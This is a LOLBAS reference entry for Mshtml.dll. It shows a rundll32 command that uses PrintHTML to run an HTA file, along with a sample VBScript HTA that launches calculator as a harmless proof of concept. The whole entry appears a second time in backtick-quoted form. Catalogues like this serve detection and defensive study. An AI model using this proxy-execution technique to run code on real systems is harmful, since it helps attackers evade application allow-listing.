LOLBAS/OSLibraries/Mshtml.md

## Mshtml.dll

* Functions: Execute

```
rundll32.exe Mshtml.dll,PrintHTML "C:\temp\calc.hta"    
```

Acknowledgements:
* Pierre-Alexandre Braeken - @pabraeken

Code sample (calc.hta):
```
<html>
<head>
	<title>LOLBin</title>
	<script language="VBScript">
		Sub RunProgram
            Set objShell = CreateObject("Wscript.Shell")
            objShell.Run "c:\windows\system32\calc.exe"
			Self.Close
        End Sub
	</script>
</head>
<body onload="RunProgram">
    <h1>LOLBin</h1>
</body>
</html>
```

Resources:
* https://twitter.com/pabraeken/status/998567549670477824

Full path:
```
c:\windows\system32\Mshtml.dll
c:\windows\sysWOW64\Mshtml.dll
```

Notes:


Detection:
Create Mshtml.md 2018-05-21 14:16:59 +00:00			`## Mshtml.dll`

			`* Functions: Execute`

			```
			`rundll32.exe Mshtml.dll,PrintHTML "C:\temp\calc.hta"`
			```

			`Acknowledgements:`
			`* Pierre-Alexandre Braeken - @pabraeken`

			`Code sample (calc.hta):`
			```
			`<html>`
			`<head>`
			`<title>LOLBin</title>`
			`<script language="VBScript">`
			`Sub RunProgram`
			`Set objShell = CreateObject("Wscript.Shell")`
			`objShell.Run "c:\windows\system32\calc.exe"`
			`Self.Close`
			`End Sub`
			`</script>`
			`</head>`
			`<body onload="RunProgram">`
			`<h1>LOLBin</h1>`
			`</body>`
			`</html>`
			```

			`Resources:`
			`* https://twitter.com/pabraeken/status/998567549670477824`

			`Full path:`
			```
			`c:\windows\system32\Mshtml.dll`
			`c:\windows\sysWOW64\Mshtml.dll`
			```

			`Notes:`


			`Detection:`